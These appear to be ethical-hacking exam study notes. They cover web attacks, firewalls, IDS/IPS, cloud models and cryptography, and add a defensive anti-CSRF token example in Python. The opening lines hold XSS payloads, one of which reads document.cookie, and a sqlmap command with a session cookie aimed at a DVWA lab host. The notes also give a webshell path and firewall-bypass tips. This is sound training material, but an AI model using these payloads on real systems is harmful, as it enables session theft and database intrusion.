<script>window.location='https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf'</script>
///

<script>alert(document.cookie)</script>

security=low; PHPSESSID=2d6fa9c1c72a3f140bfa413e966fea4b

sqlmap --cookie="security=low; PHPSESSID=2d6fa9c1c72a3f140bfa413e966fea4b" -u "http://192.168.1.9/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --dbs

CSRF / XSRF (Cross Site request Forgery)

Account no. , Card number , CVV OTP

A hacker can make a client send an authenticated request without the knowledge of the
target.

Remedy: 2-factor (ex: OTP), don't rely only on cookie-based authentication, anti-CSRF
token
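Added example (not from the notes) for both CSRF passages, the three-step attack flow earlier and the anti-CSRF token remedy here: a session-bound token issued with the form and verified on the state-changing POST. The server key and the transfer handler are constructed.

```python
import hashlib
import hmac
import secrets

# Constructed per-deployment secret; in production it comes from the server's secret store.
SERVER_KEY = secrets.token_bytes(32)


def _mac(session_id: str, nonce: str) -> str:
    return hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()


def issue_csrf_token(session_id: str) -> str:
    """Token embedded in the form as a hidden field. It is bound to the session,
    so a request forged from another site cannot carry a valid one: the
    attacker's page can make the browser attach the victim's cookie, but it
    cannot read this value out of the legitimate page."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Constant-time comparison; a token for another session or a malformed
    token fails."""
    nonce, _, mac = token.partition(".")
    return bool(mac) and hmac.compare_digest(mac, _mac(session_id, nonce))


def handle_transfer(session_id: str, form: dict) -> tuple:
    """The state-changing POST (the account/card operation in the notes).
    Rejected unless the form carries a valid token for this session; GET
    requests must never change state at all."""
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return 403, "CSRF token missing or invalid"
    return 200, f"transferred {form['amount']} to {form['to_account']}"
```

Pairing the token with the `SameSite` cookie attribute from the session checklist gives two independent controls against the same forged request.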

File Inclusion
Information Disclosure if inclusion path is given
Code Execution if we could add our own file to the inclusion
LFI (Local File Inclusion) Information Disclosure
RFI (Remote File Inclusion) Code Execution

File Upload
Gaining Webshells (Gaining access on Web server through web application)

Path of webshells in kali => /usr/share/webshells/php

/////
Firewall, IDS/IPS, Honeypot

A device which block access to malicious / unwanted

Application Filtering // senses the type of traffic and filters accordingly (WAF)

Packet Filtering // filtering happens with respect to the content of the packets

Circuit Switching // decision is made on the sessions of the user

Stateful Inspection // combination of two or more of the above

tool to detect firewall(WAF) is "wafw00f"

Bypass a firewall

1.Proxying
2.Encoding
Open Source firewall: Pfsense
/////////////
IDS (Intrusion Detection System) / IPS (Intrusion Prevention System)

IDS (informs when an intruder is detected; the attack itself is allowed to continue)

IPS (performs an action, allow/block the traffic, when an intruder is identified)

NIDS/NIPS (Network IDS/IPS)


HIDS/HIPS (Host Based IDS/IPS)

Ex: Snort, KF Sensor, CISCO, Pfsense

Bypassing: Encoding

HoneyPots:

It's a rat trap for hackers.

It's a dedicated virtual machine with vulnerable services running in it, to attract


hackers and log their activity.

Ex:KF Sensor
/////////////////////////

Cloud Computing
Why Cloud ..?
Infrastructure

IAAS Infrastructure As a Service


Infra is given as a service; OS installation, libraries and other components
need to be taken care of by the client

PAAS Platform As a Service


Platform (OS) and libraries will be given; configuration and data need to be
taken care of by the client

SAAS Software As a Service


End-user software will be given; only data needs to be taken care of by the client.
Ex: Google Sheets.

Amazon Web Services(CCSP), Azure, Google Cloud Platform, Alibaba


Cloud Based Vulnerability Scanner: Cloud Checker, Black Duck, Twist Lock

DARE: Data At Rest

Cryptography.
Encryption:-
Sender:
Plain text + Algorithm = Cipher text(encrypted)

Transfer

Decryption:-
Receiver:
Cipher text(encrypted) - Algorithm = Plain text

Symmetric: the key used is the same for encryption and decryption


speed is more, security is less when communicating with a new
person

Asymmetric key used is different for encryption and decryption

Public Key: key which is visible to any one, Ex: Phone Number
Private Key: key is visible only to the user, Ex: Password

note: data encrypted with public key, can only be decrypted by its private key, and
vice versa
speed is less, security is more

Hybrid combines the advantages of both symmetric and asymmetric, and eliminates the
disadvantages of each.
SSH, https, VPN

Encoding, Encryption & Hashes


Encoding = can be decoded publicly by anyone who knows the algorithm, EX:
base64
Encryption = can be decrypted only by the person who has the key,
EX: AES, DES, RSA etc.
Hashing = a one-way algorithm which cannot be reversed, EX: md5, sha1

///
hash: converts the plain text data into a unique text
md5,sha256,sha512
hello

1. for a given file/text a unique string is generated, no matter which
computer or location is used to generate the hash.
2. Hashes are always irreversible.

hashcalc

/////
Notes:
Mock Exam:
https://www.skillset.com/certifications/ceh
http://www.gocertify.com/quizzes/ceh/ceh1.html

Practice:
http://overthewire.org/wargames/
https://www.vulnhub.com/
https://www.hackthebox.eu/
https://www.root-me.org/
https://lab.pentestit.ru/
https://attackdefense.com/

Exam Code:- 312-50

Blog: www.hackwithbkob.com

Images URL: https://drive.google.com/open?id=1iDLS9_EKqPQNmQiMVimyl-Gt320oNDXD

Mail: [email protected]
